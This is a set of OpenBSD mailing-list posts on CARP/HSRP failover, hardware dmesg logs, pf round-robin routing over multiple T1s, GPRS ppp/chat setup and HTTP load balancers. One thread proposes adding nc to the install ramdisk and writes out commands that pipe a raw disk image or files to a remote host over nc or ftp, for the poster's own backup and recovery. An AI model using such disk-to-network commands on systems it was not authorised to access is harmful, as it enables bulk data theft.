CARP / HSRP problem
I have a pair of 3.9 pf firewalls running CARP. I have two ethernet connections to my provider who is running Cisco HSRP. When they reload the active router or bounce the active interface, then the Ciscos can no longer see the CARP virtual interface until I cause a CARP failover by rebooting the active firewall or admining down the external interface on the active firewall. Through all of this, I have outbound connectivity from the firewall since it is on the same subnet as the Ciscos. I am not sure if anyone else has experienced this, but I am sure Cisco won't fix it.

Thanks in advance for your help.

Scud
Re: smtpd + dkimsign 7.0 upgraded to 7.1
Hi,

you're probably missing something along those lines:

    pki mail.example.com cert "/etc/ssl/mail.example.com.crt"
    pki mail.example.com key "/etc/ssl/private/mail.example.com.key"
    listen on egress tls pki mail.example.com
Re: 3.8 beta requests / test result on HP DL360
On 23 Aug 2005, at 01:33, Theo de Raadt wrote:
> We are heading towards making the real 3.8 release soonish. I would like to ask the community to do lots of testing over the next week if they can.

For info, here is the latest 3.8 i386 snapshot booting on a 'common corporate workhorse' HP DL360, w/ 3GB RAM & 2xCPU and single RAID1 logical disk.

Notes:

1. micky's new ciss raid driver works very well, although spits a few "ciss0: cmd_stat 2 scsi_stat 0x0" from time to time.
2. The second NIC (bge1) fails to be attached on a single processor kernel. Anyone got any suggestions for BIOS/boot tweaks to get this working?
3. if bsd.mp is booted then it drops into ddb> trying to attach bge1. I can try for a com port ps & trace if requested.
4. as mentioned in theo's mail 09-09-2005, bioctl supports only ami so far - I wonder if ciss support is likely? a documentation issue I suspect.
5. dmesg below:

OpenBSD 3.8 (GENERIC) #137: Thu Sep 1 17:41:20 MDT 2005
    [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 2.80GHz ("GenuineIntel" 686-class) 2.80 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,CNXT-ID
real mem = 3220783104 (3145296K)
avail mem = 2931396608 (2862692K)
using 4278 buffers containing 161140736 bytes (157364K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @ 0xf
pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:15:0 ("ServerWorks CSB5 SouthBridge" rev 0x00)
pcibios0: PCI bus #0 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000 0xee000/0x2000!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "ServerWorks CNB20-HE" rev 0x31
pchb1 at pci0 dev 0 function 1 "ServerWorks CNB20-HE" rev 0x00
pchb2 at pci0 dev 0 function 2 "ServerWorks CNB20-HE" rev 0x00
pci1 at pchb2 bus 1
bge0 at pci1 dev 2 function 0 "Broadcom BCM5703X" rev 0x02, BCM5703 A2 (0x1002): irq 11 address 00:0b:cd:4e:4a:3a
brgphy0 at bge0 phy 1: BCM5703 10/100/1000baseT PHY, rev. 2
vga1 at pci0 dev 3 function 0 "ATI Rage XL" rev 0x27
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
ciss0 at pci0 dev 4 function 0 "Compaq Smart Array 5i/532 rev.2" rev 0x01: irq 3
ciss0: 1 LD HW rev 1 FW 2.36/2.36 lmap 4000:0
scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0: SCSI0 0/direct fixed
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
sd0: 34727MB, 34727 cyl, 64 head, 32 sec, 512 bytes/sec, 71122560 sec total
vendor "Compaq", unknown product 0xb203 (class system subclass miscellaneous, rev 0x01) at pci0 dev 5 function 0 not configured
vendor "Compaq", unknown product 0xb204 (class system subclass miscellaneous, rev 0x01) at pci0 dev 5 function 2 not configured
pcib0 at pci0 dev 15 function 0 "ServerWorks CSB5 SouthBridge" rev 0x93
pciide0 at pci0 dev 15 function 1 "ServerWorks CSB5 IDE" rev 0x93: DMA
atapiscsi0 at pciide0 channel 0 drive 0
scsibus1 at atapiscsi0: 2 targets
cd0 at scsibus1 targ 0 lun 0: SCSI0 5/cdrom removable
cd0(pciide0:0:0): using PIO mode 4
ohci0 at pci0 dev 15 function 2 "ServerWorks OSB4/CSB5 USB" rev 0x05: irq 10, version 1.0, legacy support
usb0 at ohci0: USB revision 1.0
uhub0 at usb0
uhub0: ServerWorks OHCI root hub, rev 1.00/1.00, addr 1
uhub0: 4 ports with 4 removable, self powered
pchb3 at pci0 dev 15 function 3 "ServerWorks CSB5 PCI" rev 0x00
pchb4 at pci0 dev 17 function 0 "ServerWorks CIOBX2" rev 0x05
pchb5 at pci0 dev 17 function 2 "ServerWorks CIOBX2" rev 0x05
pci2 at pchb5 bus 4
bge1 at pci2 dev 2 function 0 "Broadcom BCM5703X" rev 0x02: couldn't establish interrupt at irq 15
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
pcppi0 at isa0 port 0x61
midi0 at pcppi0:
spkr0 at pcppi0
sysbeep0 at pcppi0
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask e7ed netmask efed ttymask ffef
pctr: user-level cycle counter enabled
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
dkcsum: sd0 matches BIOS drive 0x80
root on sd0a
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
rootdev=0x400 rrootdev=0xd00 rawdev=0xd02
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
Booting hangs at fxp detection (and crypto h/w)
Hi,

I'm having trouble booting an i386 box - it seems to hang at detecting the fxp NICs (2 present, on motherboard, not possible to disable in BIOS). If I enable verbose booting in UKC it hangs at:

    ...
    >>>probing for pcic*
    >>>pcic probe returned 0
    >>>fxp probe won
    fxp0 at pci0 dev 16 function 0 "Intel 82559ER" rev 0x09

below is the complete dmesg, with fxp disabled to get it complete. Anyone any ideas on possible causes/workaround?

Also the 'vendor "Invertex", unknown product 0x0006 (class processor subclass Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured' should be a HiFn crypto card. Any ideas why this is not recognised?

thanks,
/Pete

#dmesg
OpenBSD 3.8-current (GENERIC) #202: Wed Oct 19 17:52:24 MDT 2005
    [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 449 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
real mem = 536453120 (523880K)
avail mem = 482627584 (471316K)
using 4278 buffers containing 26927104 bytes (26296K) of memory
User Kernel Config
UKC> disable fxp
103 fxp* disabled
104 fxp* disabled
UKC> exit
Continuing...
mainbus0 (root)
bios0 at mainbus0: AT/286+(d9) BIOS, date 11/16/00, BIOS32 rev. 0 @ 0xfc960
pcibios0 at bios0: rev 2.1 @ 0xfc9d0/0x900
pcibios0: PCI BIOS has 11 Interrupt Routing table entries
pcibios0: PCI Exclusive IRQs: 3 4 5 7 9 10 11 12 14 15
pcibios0: PCI Interrupt Router at 000:07:0 ("Acer Labs M1533 ISA" rev 0x00)
pcibios0: PCI bus #1 is the last bus
ipmi at mainbus0 not configured
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Acer Labs M1541 PCI" rev 0x04
ppb0 at pci0 dev 1 function 0 "Acer Labs M5243 AGP/PCI-PCI" rev 0x04
pci1 at ppb0 bus 1
ohci0 at pci0 dev 2 function 0 "Acer Labs M5237 USB" rev 0x03pci_intr_map: no mapping for pin A
: couldn't map interrupt
"Acer Labs M7101 Power" rev 0x00 at pci0 dev 3 function 0 not configured
pcib0 at pci0 dev 7 function 0 "Acer Labs M1533 ISA" rev 0xc3
vendor "Invertex", unknown product 0x0006 (class processor subclass Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured
pciide0 at pci0 dev 15 function 0 "Acer Labs M5229 UDMA IDE" rev 0xc1: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0:
wd0: 16-sector PIO, LBA, 19092MB, 39102336 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
pciide0: channel 1 disabled (no drives)
"Intel 82559ER" rev 0x09 at pci0 dev 16 function 0 not configured
"Intel 82559ER" rev 0x09 at pci0 dev 18 function 0 not configured
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard
pcppi0 at isa0 port 0x61
midi0 at pcppi0:
spkr0 at pcppi0
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom0: console
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
biomask ff65 netmask ff65 ttymask ffe7
pctr: user-level cycle counter enabled
mtrr: K6-family MTRR support (2 registers)
dkcsum: wd0 matches BIOS drive 0x80
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
Q: why is OpenBSD's openssl build without -pthread ???
Hi,

Can anyone tell me why OpenBSD's openssl is not built with -pthread? I'm evaluating 'pound' SSL reverse proxy ( http://www.apsis.ch/pound/ ), which seems to require threaded SSL libs. The OpenBSD supplied openssl seems to have threads disabled, but if I retrieve & make a local copy with the -pthread compiler option, it seems to build & run fine. I'm sure there's a good reason for it not being enabled by default - I'm just interested to know what it is...

thanks
/Pete
rapid response to ordering :-)
Hi,

Just to say thanks to all involved. I ordered my 3.8 CDs via the OpenBSD/europe page on Tuesday, and they arrived today (Friday)... in Norway. All intact and unblemished (as usual). Great service, thanks :-)

/Pete
Re: CDP with OpenBSD
Hi,

On 19. nov. 2005, at 18.58, [EMAIL PROTECTED] wrote:
> Hi All,
> I am searching for a Tool with which I can do the Cisco Discovery Protocol (CDP) requests on an OpenBSD.

no such things as CDP requests. A host can merely transmit (broadcast) CDP info packets (by default every 60secs), and/or listen for them.

> I searched in the ports and packets but did not find any. Does anyone know one?

I've used this before: http://sourceforge.net/projects/scdp/ you need to tweak a couple of trivial 'all the world is x86' bugs, if all your world is not. I'll make a port if there's any demand.

> After a Google search I found only a pen test tool. http://yersinia.sourceforge.net/

Looks interesting.

> I tried to install it on an OpenBSD 3.7 Stable. I got "Libpcap (at least 0.8.x) library is needed in order to compile Yersinia!!"... I downloaded the http://www.tcpdump.org/release/libpcap-0.9.4.tar.gz but I was not sure to which directory I should install it. Any hints how to upgrade the libpcap libraries and to which directory without getting any problems?
>
> Thanks,
> Stefan
additional features in bsd.rd
Hi Developers,

I have a suggestion regarding ramdisk / bsd.rd: I believe it (they) could be even more useful with the addition of the 'nc' utility on its internal filesystem. I added a line referencing /usr/bin/nc to (for example) /usr/src/distrib/i386/common/list, and made a release(8). The resulting bsd.rd file was not significantly bigger (in my completely unqualified opinion). However I could then:

1. Get a dmesg output from CD-ROM booted bsd.rd to my other machine for emailing etc.

    # dmesg | nc 10.20.30.40 1234

2. Get information off a machine, either for backup purposes or data recovery etc.

    # dd if=/dev/rwd0c | nc 10.20.30.40 1234

3. Restore a 'disk image' from above...

    # nc -l 1234 | dd of=/dev/rwd0c

(I keep a spare USB 802.11g ural http://www.gigabyte-usa.com/Communication/Products/Products_Wireless_GN-WBKG.htm device and an official CD along with my laptop on customer visits, so this would be very convenient for me...)

If I've overlooked something, or if the size increase is in fact significant (and breaks something else), then I apologise, otherwise I hope it's a valid & useful suggestion...

p.s. I'm aware that any such network transfers would be unencrypted, obviously depending on the sensitivity, an ethernet cross-over cable could be used. Just because I give you a gun doesn't mean you have to shoot yourself in the foot with it.

/Pete
Re: additional features in bsd.rd
On 22. nov. 2005, at 12.42, Stuart Henderson wrote:
> --On 22 November 2005 12:01 +0100, Pete Vickers wrote:
>> 1. Get a dmesg output from CD-ROM booted bsd.rd to my other machine for emailing etc.
>> # dmesg | nc 10.20.30.40 1234
>> 3. Restore a 'disk image' from above...
>> # nc -l 1234 | dd of=/dev/rwd0c
>
> You can already do those things with 'ftp -o -'..

unless I read ftp(1) incorrectly, then it supports retrieve only, with no ability to send - which was my main desire.

>> 2. Get information off a machine, either for backup purposes or data recovery etc.
>> # dd if=/dev/rwd0c | nc 10.20.30.40 1234
>
> I'm not sure the ability to dd a raw image directly is worth the extra bytes (if you look at cvs log, you'll see that quite small savings are considered important - 16k is huge in comparison to some of these).

ability to get info / files / data _off_ the machine really. But I suspect you may be correct that 16k is too 'expensive'.

/Pete
Re: additional features in bsd.rd
On 23. nov. 2005, at 23.03, Chris Kuethe wrote:
> On 23/11/05, Olivier Cherrier <[EMAIL PROTECTED]> wrote:
>> You can download and upload files using ftp(1). I use to do it since OpenBSD 2.9, using standard floppies.
>
> i think he wants to do something like
>
>     ftp -u /tmp/thingy ftp://myserver/pub/incoming/dmesg.txt
>
> to upload /tmp/thingy to myserver, or
>
>     dd if=/dev/wd0c bs=256k | ftp -u - ftp://myserver/pub/incoming/wd0c.img
>
> to send a disk image someplace. more than once i've built static copies of nc and brought them into the ramdisk with ftp just so that i could send disk images out...

Yep, the point is that in lots of situations, you need to get info/data on/off a machine 'running' bsd.rd, and nc is, in best unix tradition, a simple, efficient, and very convenient tool to do so. You don't even need the hassle of firing up ftpd and sorting accounts etc on another machine, nc will do there too. Since there are already several different versions of restricted space 1.44MB floppy images (floppy/B/C), and also fuller featured CD fs, maybe nc could be added just to the CD version?

/Pete
Re: #define failure opportunity
On 11/28/05, Qv6 <[EMAIL PROTECTED]> wrote:
> On Monday 28 November 2005 04:04 pm, Theo de Raadt wrote:
> > This is why OpenBSD/OpenSSH does not need to hire a spin doctor.
> >
> > Other people do it for us ;)
> >
> > http://www.ssh.com/company/newsroom/article/684/
> >
> > And... thanks to those of you who supported us when they were
> > threatening to sue us years ago..
>
> Interesting news.
>
> I once worked for a major Telecom firm that used a commercial implementation of ssh. I was curious and I asked one of the other techies why pay for ssh when openssh is available. "Because we can go to the company for support" was his answer.
>
> I couldn't help but wonder what type of issues people encounter while using openssh. Aside from the usual software bugs, has there really been any major problems with openssh that the community has not fixed promptly?
>
> Not that I don't think openssh is superior for the fact that it *is* open software,

I bet that the company in question needs software support lisc. for legal issues. If the software goes tits up and costs the company N dollars it is easier to get that money from a commercial entity whom you have a contract with (or more likely get money via an insurance broker of some sort). At least that's the best I've been able to see through that line of reasoning :^)

-p

--
~~o0OO0o~~
Pete Wright
www.nycbug.org
NYC's *BSD User Group
Re: my multipath routing questions...
Hi,

Dunno if OBSD & your ISP supports it, but maybe try running multi-link ppp over the links, to 'bond' them into a single virtual interface which routing could point at...

Alternatively if you are hosting, presumably most of your traffic is originating 'inbound' from the 'net, and thus your ISP will decide which physical link to send the packets down - a route-to/reply-to on your end should just keep the ip 'conversation' on that pipe.

If most of your traffic is 'outbound' originated, (e.g. just users surfing all day long), then you could (and this is just an ugly hack to get you going), still use openbgp to announce your prefixes, but don't couple FIB with kernel table, and instead have a script periodically parse a 'bgpctl sh routes...or..suchlike' output, and then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'. Obviously tweaks like polling i/f stats to measure individual utilisation and bias the number of prefixes sent to each, are possible. Like I said, a hack, but might get you out of a tight spot...

what about multiple bgp sessions?

/Pete

On 30. nov. 2005, at 07.26, andrew fresh wrote:
> Hijacking this thread, cuZ now I am worried . . . .
>
> On Mon, Nov 28, 2005 at 11:46:56PM -0800, David Ulevitch wrote:
>> I'd like to hear how people are using OpenOSPFd
>
> I will prbly use OpenOSPFd in the future, but at the moment, my question is about using OpenBGPd and multiple lines from the same provider.
>
> I am getting 4 T1s from a single provider. Issues with local telco "facilities" for T3's and other things are causing me problems with getting anything different. I am going to end up with something like this:
>
>     san0-\
>     san1-\\ all connected to a single provider
>     san2-//
>     san3-/
>
> Now, I assume I will have a single BGP session with them. (I have very little information for lines that are supposed to be installed tomorrow morning at 9am).
>
> Right now I have a cisco 3640 that has 2 T1's from AT&T and 2 from Sprint, it has enough trouble with those which is why I want to replace it with an OpenBSD box. I am going to have an iBGP session with the 3640 and an eBGP session with my new provider. I will be adding 20Mb over ethernet at some point in the fairly near future (if they can ever get it installed) and will hopefully be getting rid of the 3640 at that point.
>
> The OpenBSD router will not be doing any NAT, it will be passing public IPs.
>
> This is what has me worried:
>
> On Tue, Nov 29, 2005 at 03:33:07PM +0100, Claudio Jeker wrote:
>> There is no kernel support for multipath routing.
>
> I want to load balance across those 4 T1s and it is sounding like I will not be able to do that and will have to figure out how to get these 4 new lines into my old cisco router.
>
> Unfortunately trunk(4) doesn't work with san interfaces :-( and that is how it looked possible to do the bonding/inverse muxing that I was going for.
>
>     $ ifconfig trunk0 trunkport san0 trunkport san1
>     ifconfig: SIOCSTRUNKPORT: Protocol not supported
>
> It would be really kewl to use the trunk(4) interface for the BGP peer address, since it now does failover, it would be up as long as any individual lines were up. It would be even kewler if it would be able to change the weighting on that interface depending on the number of lines in the trunk, but I guess I am dreaming again.
>
> I guess I am looking for something like 'ip load-sharing per-packet' in cisco terms.
>
> But my real question is: How do I get OpenBSD to treat those 4 T1s as a single line and share the load across them? or, how do I get a reasonable approximation from OpenBSD?
>
> Also, with those 4 T1s, I want to make sure that in case any of the 4 go down, the BGP session will stay up. With a cisco box, I just bind the session to a loopback address, add routes for each interface and it will choose one of the interfaces that is up to get to the destination. How do I do this with OpenBSD?
>
> Will the BGP session just work when I solve the load balancing issue? or do I have to do weird things with ifstated(8) (like 16 states for the 4 lines and lots of route add/delete statements)? or something with 'route-to' in pf?
>
> http://marc.theaimsgroup.com/?l=openbsd-misc&m=112831360613745&w=2
>
> This seems to work in my test environment:
>
>     # t1s is an interface group containing all of the links to that provider
>     pass out on t1s route-to { \
>         (san0 10.35.0.2) \
>         (san1 10.35.1.2) \
>         (san2 10.35.2.2) \
>         (san3 10.35.3.2) \
>         } round-robin keep state
>     pass in on san0 reply-to (san0 10.35.0.2) keep state
>     pass in on san1 reply-to (san1 10.35.1.2) keep state
>     pass in on san2 reply-to (san2 10.35.2.2) keep state
>     pass in on san3 reply-to (san3 10.35.3.2) keep state
>
> l8rZ,
> --
> andrew - ICQ# 253198 - JID: [EMAIL PROTECTED]
>
> Proud member: http://www.mad-techies.org
>
> BOFH excuse of the day: telnet: Unable to connect to remote host: Connection refused
Re: my multipath routing questions...
Hi,

On 30. nov. 2005, at 13.21, Claudio Jeker wrote:
> On Wed, Nov 30, 2005 at 12:53:32PM +0100, Pete Vickers wrote:
>> Hi,
>>
>> Dunno if OBSD & your ISP supports it, but maybe try running multi-link ppp over the links, to 'bond' them into a single virtual interface which routing could point at...
>
> sppp(4) does not support multilink ppp.

shame...

>> Alternatively if you are hosting, presumably most of your traffic is originating 'inbound' from the 'net, and thus your ISP will decide which physical link to send the packets down - a route-to/reply-to on your end should just keep the ip 'conversation' on that pipe.
>>
>> If most of your traffic is 'outbound' originated, (e.g. just users surfing all day long), then you could (and this is just an ugly hack to get you going), still use openbgp to announce your prefixes, but don't couple FIB with kernel table, and instead have a script periodically parse a 'bgpctl sh routes...or..suchlike' output, and then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'. Obviously tweaks like polling i/f stats to measure individual utilisation and bias the number of prefixes sent to each, are possible.
>
> Uhm. I think you switched the two. hosting has mostly outbound traffic while end users cause inbound traffic.

no switch i believe. Although I agree hosting => mostly outbound traffic, the IP conversation is initiated from the remote party, _inbound_. And therefore it's the ISP which decides which link to send the TCP SYN (or whatever) down, and thus basic route-to packet directing would tie the entire conversation to that same line.

>> Like I said, a hack, but might get you out of a tight spot...
>>
>> what about multiple bgp sessions?
>
> Wont help much unless you start some real evil filtering to balance the 4 t1 links.

/Pete

On 30. nov. 2005, at 07.26, andrew fresh wrote:
> Hijacking this thread, cuZ now I am worried . . . .
Re: upgrade halted
if you can read /var/log/authlog, you are in wheel (unless you've changed perms on it). So just use scp to copy ksh to /usr/local/bin/tcsh...

/Pete

On 19. apr. 2006, at 17.15, Jasper Bal wrote:
> Nick Holland wrote:
>> and then log in (or have them disable PF or ...). You can also look at /var/log/authlog for clues as to why you can't log in as you wish now.
>>
>> Nick.
>
> Thanks Nick. Look what I found in authlog:
>
>     Apr 19 16:09:17 Speculum sshd[15678]: User jabal not allowed because shell /usr/local/bin/tcsh does not exist
>
> This is probably stupid, but I removed the tcsh pkg. I did think about possible difficulties logging in without, but i didn't think long enough. All my users use tcsh. Root uses csh. If I could only remember the password...
>
> Jasper
Nokia D211 GPRS/WLAN pc-card
Hi,

I've just spent some time trying to get a Nokia D211 pc-card to function under OpenBSD (i386 / -current). It didn't meet with any success, so the main point of this email is to document what I tried for the archives/google. In the event anyone has had more success than me, please let me know.

The card overview is available here - http://nokia.com/phones/nokiad211/ and it essentially contains both a GPRS(GSM) radio and an 802.11b radio. However whilst windows and linux drivers are available for download, it is a dreaded binary blob, and thus virtually useless under OpenBSD unless documentation is forthcoming.

Since Nokia also have single function GPRS cards "Nokia Card Phone 2.0" ( http://www.europe.nokia.com/cda1/0,4267,2522,00.html ), I tried tweaking /usr/src/sys/dev/pcmcia/pcmciadevs etc to get the driver to attach it as one of them. And whilst the driver appears to attach:

    pccom3 at pcmcia0 function 0 "Nokia, D211" port 0xa000/16: ns8250, no fifo

it is clearly different from a real Card Phone:

    pccom3 at pcmcia0 function 0 "Nokia Mobile Phones, Nokia Card Phone" port 0xa000/16: ns16550a, 16 byte fifo

and pointing 'tip' at it does not yield anything.

Nokia also produce a single function 802.11b card "C110" ( http://www.europe.nokia.com/nokia/0,8764,2701,00.html ), so I also tried adding the D211's pcmcia details in /usr/src/sys/dev/pcmcia/if_wi_pcmcia.c etc to get that driver to attach. Alas this was also unsuccessful, whilst the driver attached, the dmesg line indicated that the driver failed to retrieve a MAC address from the card, and no interface was created.

/Pete
Re: entering custom AT commands into ppp.conf
Hi,

Here's my configs, should give you some hints.. mobile phone is connected to 'COM1' at 57600baud, adding a system default route via the new ppp link, and automatically redialing immediately after link failure:

=/etc/ppp/peers/ISP
    /dev/tty00
    57600
    defaultroute
    debug
    #kdebug 7
    lock
    user my_username
    noauth
    noccp
    novj
    noipdefault
    persist
    #demand
    connect '/usr/sbin/chat -e -v -f /etc/ppp/peers/chat/ISP-gprs'
=

script to initialise modem, and dial ISP: (CFUN/CPIN... is to reset the phone, then enter the PIN code etc)

=/etc/ppp/peers/chat/ISP-gprs
    REPORT "Starting chat script..."
    ABORT ERROR
    ABORT BUSY
    ABORT 'NO CARRIER'
    ABORT 'NO DIALTONE'
    '' ATZ
    OK AT+CFUN=1,1
    OK \d\dAT+CPIN=1234
    OK AT+CGDCONT=1
    OK AT+CGDCONT=1,"IP","my.apn.name",,0,0
    OK ATD*99***1#
    CONNECT
=

your ISP username & password (see pap-secrets instead if applicable):

=/etc/ppp/peers/chap-secrets
    #secrets for authentication using CHAP
    # client        server  secret          IP addresses
    my_username     *       my_password     *
=

create the i/f at boot time, and initiate connection:

=/etc/hostname.ppp0
    up
    !pppd call ISP
=

To debug:
- $ sudo ifconfig ppp0 create
- $ sudo pppd dial ISP
- tail /var/log/daemon, /var/log/chat (after syslogd.conf uncommenting/restart) and /etc/ppp/connection-errors

Hope this is of use.

/Pete

On 8. jun. 2006, at 08.07, Marius Van Deventer - Umzimkulu wrote:
> Hi all.
>
> By asking this question i admit that i have no idea how ppp.conf works. For a normal modem i am able to configure it fine, but for this problem i have to admit that i have no idea. I found some hits on google but nothing specific.
>
> I managed (finally) to get gprs working on OpenBSD using my Nokia 6680. Apart from some default route issues it works fine. But... I have to enter the init strings manually using minicom before i dial. i enter: ATZ and then AT+CGDCONT=1,"IP","internet" then i exit minicom with no reset (ctrl-a q) and dial. Obviously there HAS to be a way to include these in ppp.conf. All my attempts have failed.
> I'm sorry for the newbie-like question. Please direct answers to the list and flames to my private address :-)
>
> Cheers
> Marius Van Deventer
> Computer Technician
> Bytes Technology Group : Systems Integration
new hardware platform ?
Hi,

After contemplating for some time between buying a Zaurus C3100 and a HPC jazjar/universal (aka Qtek 9000, i-mate, O2 XDA Exec, T-Mobile MDA IV etc), to satisfy my requirement for mobile remote administration needs etc. I decided to go with the Jazjar, and try to live with MS windows mobile v5 (along with 3rd party SSH client etc), for the added benefit of integrated connectivity and phone etc. An overview of the device can be found here:

http://www.gsmarena.com/qtek_9000-1264.php
http://www.qtek.nu/europe/products/9000/specifications.aspx

However, as could possibly have been predicted, Windows is driving me mad, with frequent crashes, reboots, and hanging etc. But I really like the additional hardware features over the Zaurus, such as:

- better size for pocket
- built in wlan
- built-in bluetooth
- backlit keyboard
- built in 3G transceiver
- built in mobile phone
- built in video-conferencing (2 x video cameras)

So what I'm wondering is if any developers would like to try porting OpenBSD to the Jazjar platform? I appreciate that the Zaurus port already exists for this niche, and that sufficient documentation would almost certainly be problematic/impossible to acquire for the Jazjar, but I'm hoping someone would like to try?

The biggest problem that I can see with the Jazjar is the lack of physical internal disk. (It has 64MB SDRAM, and 128MB flash ROM) but I'm hoping this could be supplemented with a 1 or 2GB card in the integrated SDIO/MMC slot. Perhaps for development, remote booting is possible via either WLAN or USB connected ethernet?

For interest, there are some additional hardware details and initial linux support for the device here:

http://wiki.xda-developers.com/index.php?pagename=UniversalResearch
http://wiki.xda-developers.com/index.php?pagename=UniversalProgress

Obviously in addition to willing developer(s), some hardware would be needed to hack on. I guess at least 2 of the devices would be needed, and they run at just under $1000 USD each (including taxes, without discounts). I'm willing to stump up a significant proportion of one device if there is enough interest - both from developers and other potential users.

Comments? (flame proof clothing donned)

/Pete
Re: HTTP Load balancer
On 7. jul. 2006, at 00.11, Clint Pachl wrote:

Richard Wilson wrote:
Hulloo list, Can anyone recommend a load balancer for http/https for OpenBSD? Currently I'm using Pound, from http://www.apsis.ch/pound/ which runs under OpenBSD, and supports connection tracking via IP, cookie and request ID (eg PHPSESSID) and seems to do everything I need.

pf: see pf(4) pf.conf(5) pfctl(8) pfsync(4)

It can balance using round-robin, random, and source-hash. Stickiness can be applied to the round-robin and random methods. The stickiness option and source-hash method will satisfy https, and http if you are not sharing session data among servers. Best of all, pf is built right in and simple as hell to use. All you need to do is config your existing firewall or put a pf box in front of your webservers. Hell, you could probably even run it on all of your webservers in a carp group (haven't done this, but seems feasible). Added bonus, pf inherently balances other services, not just http! Oh, another bonus, you can easily have automatic fail-over using pfsync and carp! I'm not sure you can beat the simplicity and robustness of pf. As far as I'm concerned, pf obsoleted all load balancers for me.

I used to use pen to balance http traffic. Because of pen's design, there were discrepancies in the web logs, where all connections, from the webservers' POV, were coming from the pen load balancer. So there was an add-on program, a hack, that was needed to later resolve web logs. It worked well, but what a mess.

I would like to hear why people would not desire pf over some other load balancing option.
-pachl

pound can
1. operate (route, alter, etc) on/at L7, e.g. HTTP headers/URLs
2. do https<-->http forwarding, e.g. SSL off-loading
3. log URLs with source/dest IP etc
none of these can be done via pf (unless I'm mistaken)
/Pete
Re: need a machine for an itanium port
On 9 Jun 2007, at 6:22 PM, Diana Eichert wrote:
A big shout out to deanna@ for getting this up on undeadly.org. Okay, y'all, with deanna@'s post of dlg@'s request on undeadly.org this is gathering steam. So, keep your cards (Credit) and letters ($ EUR YEN) coming, so Santa can visit Aus. a little earlier than usual this year.
diana

I've just transferred another 100eu to the Belgium account for this too. Is anybody scanning ebay for a suitable machine yet?
/Pete
Re: Setting up a virtual hosting machine w. SSH/SFTP accounts - pitfalls/experiences?
For a handy pound port see: http://folesvaert.no/pound/
/Pete

On 9 Jul 2007, at 4:59 PM, Richard Wilson wrote:
> Stuart Henderson wrote:
>> On 2007/07/08 15:30, Chris Cappuccio wrote:
>>> Stuart Henderson [EMAIL PROTECTED] wrote:
>>>> Or use different ports and proxy them based on host headers rather
>>>> than burning IP addresses (for some RIR you are expected not to use
>>>> IP addresses for non-SSL virtual web hosting).
>>>>
>>>> I haven't checked, but hoststated should be able to do this.
>>> What software would you run on port 80 to break out the requests to the
>>> various apache instances? Squid with accelerator mode seems like a massive
>>> beast to use for this purpose. Any smaller apps?
>>
>> I thought you may already be able to use hoststated but I was mistaken.
>> The least intrusive way to add it there may be to provide a new action
>> that matches on the Host: header and allows the table name to be
>> overridden (obviously this is only any good with relay, not PF tables).
>>
>> Other than that, it looks like Apache mod_proxy (ProxyPass) can be
>> configured per-virtual-host so that should work.
>>
>> http://www.apsis.ch/pound/ is another option but I don't know how
>> well it works on OpenBSD. I think I've seen it run here, but I don't
>> know if it really works well.
>>
>> Varnish can probably do this too, but doesn't run here at all.
>> (It's a bit of an unusual app...)
>>
>
> I can vouch that Pound works very well on OpenBSD, and is very BSD-like
